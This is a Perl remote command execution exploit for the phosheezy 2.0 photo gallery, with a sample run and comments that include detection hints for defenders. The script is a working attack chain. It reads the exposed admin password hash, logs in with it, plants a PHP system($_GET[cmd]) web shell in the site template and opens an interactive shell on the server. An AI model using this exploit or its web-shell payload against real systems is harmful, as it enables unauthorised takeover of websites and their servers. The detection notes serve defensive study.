phosheezy 2.0 Remote Command Execution Exploit
来源:osirys.org 作者:Osirys 发布时间:2009-01-15
#!/usr/bin/perl
# phosheezy 2.0
# http://www.ryneezy.net/apps/phosheezy/phosheezy-v0.2.tar.gz
# Remote Command Execution Exploit
# by Osirys
# osirys[at]live[dot]it
# osirys.org
# Greets: HaVoC, x0r, jay, BlackLight
# lol at athos
# --------------------------------------------------------------
# Exploit in action :D
# --------------------------------------------------------------
# osirys[~]>$ perl exp.txt http://localhost/phosheezy/
#
# ----------------------------
# Phosheezy RCE Exploit
# Coded by Osirys
# ----------------------------
#
# [+] Admin password found:
# Sha1 pwd: 8942c747dc48c47a6f7f026df85a448046348a2c
# [+] Grabbing server headers to get a valid SESSION ID ..
# [+] SESSION ID grabbed: 3srqiuh8jrttt73tbd7j5uvhi2
# [+] Succesfully logged in as Administrator
# [+] Template edited, RCE Vulnerability Created !
# shell$> id
# uid=80(apache) gid=80(apache) groups=80(apache)
# shell$> exit
# [-] Quitting ..
# osirys[~]>$
# --------------------------------------------------------------
use HTTP::Request; use LWP::UserAgent; use IO::Socket;
# Script entry: the only argument is the target base URL (see help() for the
# usage text). Note the file has no `use strict; use warnings;`, so several
# variables below ($datas, $h0st, $path, $password) are package globals that
# the subs share implicitly.
my $host = $ARGV[0];
# Paths appended to the base URL: the password file that is fetched first,
# the admin login page, and the template-edit action used later.
my $pwd_path = "/config/password";
my $adm_path = "/admin.php";
my $templ_path = "/admin.php?action=3";
help("-1") unless ($host);
cheek($host) == 1 || help("-2");
&banner;
# get_data() returns "host path" as one string; the split below re-derives
# $h0st and $path, which get_data() has already assigned as globals.
$datas = get_data($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);
# Step 1: plain GET of /config/password, then look for any 40-hex-digit token
# (SHA-1-sized) in the response. Defender note: the chain starts with this
# file being served by the web server; a GET for /config/password in the
# access log is the earliest detection point, and denying web access to the
# config directory removes this step.
my $url = $host.$pwd_path;
my $re = get_req($url);
if ($re =~ /([0-9a-f]{40})/) {
    $password = $1;
    print "[+] Admin password found:\n";
    print " Sha1 pwd: $password \n";
    adm_log($password);
}
else {
    print "[-] Unable to get sha1 Admin password\n\n";
    exit(0);
}
# Step 2: submit the recovered hash as the `password` field of the admin.php
# login form and harvest the session cookie from the raw response. The hash
# is posted unchanged, so no cracking takes place; as the transcript in the
# header shows, the login is accepted with it. Reads package globals $path,
# $h0st and $adm_path; sets globals $log_ and $phpsessid.
# A raw socket is used instead of LWP so the Set-Cookie header line can be
# read directly. The empty prototype `()` on the sub is a no-op here but is
# not argument validation.
# Defender note: the request is a POST to <cms_path>/./admin.php on port 80
# in clear text; a login whose password field is exactly 40 hex digits is
# a usable detection signature for this step.
sub adm_log() {
    my $password = $_[0];
    my $link = $path.".".$adm_path;
    my $post = "password=$password&Login=Login";
    my $length = length($post);
    my @data;
    my $socket = new IO::Socket::INET( PeerAddr => $h0st, PeerPort => '80', Proto => 'tcp', ) or die $!;
    # Hand-built HTTP/1.1 POST; Host header is the bare hostname from get_data().
    my $data = "POST ".$link." HTTP/1.1\r\n".
               "Host: ".$h0st."\r\n".
               "Content-Type: application/x-www-form-urlencoded\r\n".
               "Content-Length: ".$length."\r\n\r\n".
               $post."\r\n";
    $socket->send($data);
    print "[+] Grabbing server headers to get a valid SESSION ID ..\n";
    # Read the whole response (headers and body) into @data, then scan it
    # for the admin welcome text (login succeeded) and the PHPSESSID cookie.
    while (my $e = <$socket>) {
        push(@data,$e);
    }
    foreach my $e(@data) {
        if ($e =~ /Welcome to Ryneezy PhoSheezy web administration/) {
            $log_ = 1;
            print "[+] Succesfully logged in as Administrator\n";
        }
        elsif ($e =~ /Set-Cookie: PHPSESSID=([0-9a-z]{1,50});/) {
            $phpsessid = $1;
            print "[+] SESSION ID grabbed: $phpsessid\n";
        }
    }
    # Both the welcome text and a session id are required before continuing.
    (($log_)&&($phpsessid)) || die "[-] Exploit failed -> Login Failed or SESSION ID not grabbed!\n";
    RCE_create($phpsessid);
}
# Step 3: using the harvested session, POST a new layout to the template
# editor (admin.php?action=3). The submitted footer contains a PHP
# `system($_GET[cmd])` call wrapped in `<!-- cmd -->` / `<!--cmd-->` markers;
# per the transcript, the stored footer is then executed when index.php is
# rendered, and exec_cmd() uses the markers to cut the output out of the page.
# Reads package globals $path, $h0st and $templ_path; sets global $rce_c.
# Defender note: the root cause at this step is that the template editor
# stores administrator-supplied markup verbatim and the application executes
# it; a POST to admin.php?action=3 whose body contains `<?php`, or the
# `<!-- cmd -->` marker appearing in served pages, indicates this tampering.
# The `hotlog=1` cookie is sent alongside the session id; its purpose is not
# evident from this script.
sub RCE_create() {
    my $phpsessid = $_[0];
    my $link = $path.".".$templ_path;
    # Form body: header + footer + submit button, as the editor expects.
    my $code = "header=<html><head><title>Ryneezy PhoSheezy</tit".
               "le></head><body bgcolor=\"#ffffff\" text=\"#0000".
               "00\">&footer=</body></html><!-- cmd --><?php sys".
               "tem(\$_GET[cmd]);?><!--cmd-->&Submit=Edit Layout";
    my $length = length($code);
    my $socket = new IO::Socket::INET( PeerAddr => $h0st, PeerPort => '80', Proto => 'tcp', ) or die $!;
    my $data = "POST ".$link." HTTP/1.1\r\n".
               "Host: ".$h0st."\r\n".
               "Cookie: PHPSESSID=".$phpsessid."; hotlog=1\r\n".
               "Content-Type: application/x-www-form-urlencoded\r\n".
               "Content-Length: ".$length."\r\n\r\n".
               "$code\r\n";
    $socket->send($data);
    # Success is recognised only by the editor's "Edit layout again" text.
    while (my $e = <$socket>) {
        if ($e =~ /Edit layout again/) {
            $rce_c = 1;
            print "[+] Template edited, RCE Vulnerability Created !\n";
        }
    }
    $rce_c == 1 || die "[-] Can't edit Template. Exploit failed\n\n";
    &exec_cmd;
}
# Step 4: interactive prompt. Each line read from STDIN is appended to
# index.php?cmd= on the target, the page is fetched with get_req(), and the
# text following the `<!-- cmd -->` marker is printed; the closing
# `<!--cmd-->` marker is replaced by an "undefined output" message. Any input
# containing "exit" ends the session via die. The prompt re-enters itself
# recursively (`&exec_cmd;`) rather than looping. Reads global $host; sets
# globals $cmd, $exec_url and $re.
# Defender note: requests of the form index.php?cmd=<text> in the access log,
# and pages still carrying the `<!-- cmd -->` marker, are the artefacts this
# step leaves behind.
sub exec_cmd {
    print "shell\$> ";
    $cmd = <STDIN>;
    $cmd !~ /exit/ || die "[-] Quitting ..\n";
    $exec_url = ($host."/index.php?cmd=".$cmd);
    $re = get_req($exec_url);
    if ($re =~ /<!-- cmd -->(.*)/) {
        # Inner $cmd shadows the global: it holds the captured output here.
        my $cmd = $1;
        $cmd =~ s/<!--cmd-->/[-] Undefined output or bad cmd !/;
        print "$cmd\n";
        &exec_cmd;
    }
    else {
        print "[-] Undefined output or bad cmd !\n";
        &exec_cmd;
    }
}
# Fetch a URL with LWP (GET, 4-second timeout) and return the response body.
# $link is assigned without `my`, so it is a package global. No HTTP status
# check is performed; an error page's body is returned like any other.
sub get_req() {
    $link = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
}
# Argument check (name is the author's spelling of "check"): returns 1 when
# the argument contains "http://", 0 otherwise. Only the scheme is validated;
# the host part is not inspected here, and https:// targets are rejected.
sub cheek() {
    my $host = $_[0];
    if ($host =~ /http:\/\/(.*)/) {
        return 1;
    }
    else {
        return 0;
    }
}
# Split the base URL into a bare hostname and a leading-slash path, returning
# them joined by a single space. Side effect: assigns the package globals
# $s_host, $h0st, $path and $full_det, which the other subs read directly.
# The hostname capture `[a-z.]{1,30}` accepts only lowercase letters and
# dots, so hosts containing digits, hyphens or uppercase letters (including
# IP addresses) leave $h0st undefined. A leading "www." is stripped.
sub get_data() {
    my $host = $_[0];
    $host =~ /http:\/\/(.*)/;
    $s_host = $1;
    $s_host =~ /([a-z.]{1,30})\/(.*)/;
    ($h0st,$path) = ($1,$2);
    $h0st !~ /www/ || $h0st =~ s/www\.//;
    # Prefix the path with "/" so it can be concatenated onto the request line.
    $path =~ s/(.*)/\/$1/;
    $full_det = $h0st." ".$path;
    return $full_det;
}
# Print the tool banner shown at start-up and on usage errors.
sub banner {
    print "\n".
          " ---------------------------- \n".
          " Phosheezy RCE Exploit \n".
          " Coded by Osirys \n".
          " ---------------------------- \n\n";
}
# Print an error-specific message (-1: no argument, -2: failed cheek()),
# then the usage line, and exit with status 0. Note the caller passes the
# codes as the strings "-1"/"-2"; the numeric `==` comparison still matches.
sub help() {
    my $error = $_[0];
    if ($error == -1) {
        &banner;
        print "\n[-] Cheek that you provide a hostname address!\n";
    }
    elsif ($error == -2) {
        &banner;
        print "\n[-] Bad hostname address !\n";
    }
    print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
    exit(0);
}